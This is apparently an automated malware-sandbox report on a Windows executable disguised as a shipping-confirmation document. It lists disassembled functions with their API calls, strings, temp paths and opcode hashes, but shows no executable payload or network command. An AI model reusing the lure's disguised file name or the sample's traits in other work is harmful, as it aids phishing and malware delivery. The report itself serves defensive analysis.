Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID: @Hmu
API String ID: 4216380887-887474944
Opcode ID: ad246ecfaae7bc0e341421153f1411752814a7e057c997986689992f8f956acd
Instruction ID: 3e1646181e8c605206c8af70f6fbb294f4bedd98200f5409a6cc385e5006fe1e
Opcode Fuzzy Hash: ad246ecfaae7bc0e341421153f1411752814a7e057c997986689992f8f956acd
Instruction Fuzzy Hash: 5F418BB1908389DFE735AF259850F26B7BDFB44310F104A1EE44AC6E81E73CA985CB61

Function 00405707 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8

Function 00403033 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 0040304E
GetTickCount.KERNEL32 ref: 0040306C
wsprintfW.USER32 ref: 0040309A

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
ShowWindow.USER32(00000000,00000005), ref: 004030CC

Part of subcall function 00403017: MulDiv.KERNEL32(00000000,00000064,0003BF04), ref: 0040302C

Strings

... %d%%, xrefs: 00403094

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
Opcode Fuzzy Hash: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D

Function 00404FBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
GetMessagePos.USER32 ref: 00404FDF
ScreenToClient.USER32(?,?), ref: 00404FF9
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031

Strings

f, xrefs: 0040500D

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5

Function 00402F98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
wsprintfW.USER32 ref: 00402FEA
SetWindowTextW.USER32(?,?), ref: 00402FFA
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C

Strings

verifying installer: %d%%, xrefs: 00402FDF
unpacking data: %d%%, xrefs: 00402FD8, 00402FE8

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99

Function 733B2655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 733B12BB: GlobalAlloc.KERNELBASE(00000040,?,733B12DB,?,733B137F,00000019,733B11CA,-000000A0), ref: 733B12C5

GlobalFree.KERNEL32(?), ref: 733B2743
GlobalFree.KERNEL32(00000000), ref: 733B2778

Memory Dump Source

Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 0eea5a8b12b7b8bdb45ae9115d08947622783880005763b89c6c59b8d71658d6
Instruction ID: 3d54094cabb9978edb60fab4c39203b52df03461c1c3ff6c0b5ebc0ce230e189
Opcode Fuzzy Hash: 0eea5a8b12b7b8bdb45ae9115d08947622783880005763b89c6c59b8d71658d6
Instruction Fuzzy Hash: EE31FE72A04189EFE7369F51CD85F2AB7BEEB86300324062DF145C7A61E73C98058B69

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98

Function 00404EAE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
wsprintfW.USER32 ref: 00404F58
SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B

Strings

%u.%u%s%s, xrefs: 00404F39
H/B, xrefs: 00404F41

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H/B
API String ID: 3540041739-2222257793
Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8

Function 733B1979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 733B19DA
GlobalFree.KERNEL32(?), ref: 733B1B7A
GlobalFree.KERNEL32(?), ref: 733B1B7F

Memory Dump Source

Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 39ef31c6ece13e76774a2901bc3646dfe181a2a12f09acea8dff6e8caab14c19
Instruction ID: 9b88fbd6e5406bb9a9856c889a2e802b2c0e255f1586f3a63c0d3578233bb26b
Opcode Fuzzy Hash: 39ef31c6ece13e76774a2901bc3646dfe181a2a12f09acea8dff6e8caab14c19
Instruction Fuzzy Hash: 0A51A372D00118EBDB32DFA4884079EBBBFEB44350F15415ED406A3A98F77DAA468791

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED

Function 733B16BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,733B22D8,?,00000808), ref: 733B16D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,733B22D8,?,00000808), ref: 733B16DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,733B22D8,?,00000808), ref: 733B16F0
GetProcAddress.KERNEL32(733B22D8,00000000), ref: 733B16F7
GlobalFree.KERNEL32(00000000), ref: 733B1700

Memory Dump Source

Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: d9a4b4cfa391c7dcbf47637aa2b1563f4936c18b2394dd85c8e1fbb001d628a9
Instruction ID: 53d98359a2b6c808564b7bb78ce009b1a9f62ad34e014368c96fa34191fbd8c9
Opcode Fuzzy Hash: d9a4b4cfa391c7dcbf47637aa2b1563f4936c18b2394dd85c8e1fbb001d628a9
Instruction Fuzzy Hash: 7AF01C732061387BE63026A79C4CDABBE9CEF8B2F5B210215F62C9229096654C01D7F5

Function 00405FFC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 0040600A
CharNextW.USER32(00000000), ref: 0040600F
CharNextW.USER32(00000000), ref: 00406027

Strings

C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 00405FFD

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
API String ID: 3213498283-247911329
Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
Instruction ID: 6b36e5aaf6ec4384ffc5acae3f619c12edb839be27b3f0f06f1fa7befb24a934
Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
Instruction Fuzzy Hash: 00F0963198061595DE31F6584C45A7767BCDF55394B02807BE602B71C1D7B888E186DA

Function 00405F51 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F73

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD

Function 733B10E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

